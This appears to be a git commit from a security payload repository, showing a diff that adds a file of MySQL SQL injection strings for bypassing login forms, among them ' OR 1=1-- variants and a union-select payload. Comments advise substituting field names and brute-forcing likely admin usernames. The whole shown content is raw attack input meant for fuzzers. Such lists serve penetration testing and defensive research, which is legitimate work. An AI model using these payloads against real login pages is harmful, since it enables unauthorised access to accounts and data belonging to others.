XSS Intruder + Eicar + SSRF http://0

2026-01-17 07:11:35 -08:00 · 2017-07-30 13:17:00 +02:00
parent 064467ecfc
commit 8a3693855f
33 changed files with 87 additions and 80 deletions
--- a/injection/Intruders/FUZZDB_MySQL_SQLi_LoginBypass.txt
+++ b/injection/Intruders/FUZZDB_MySQL_SQLi_LoginBypass.txt
@@ -0,0 +1,8 @@
+# regex replace as many as you can with your fuzzer for best results:
+# <user-fieldname> <pass-fieldname> <username> 
+# also try to brute force a list of possible usernames, including possile admin acct names
+<username>' OR 1=1--
+'OR '' = '	Allows authentication without a valid username.
+<username>'--
+' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
+'OR 1=1--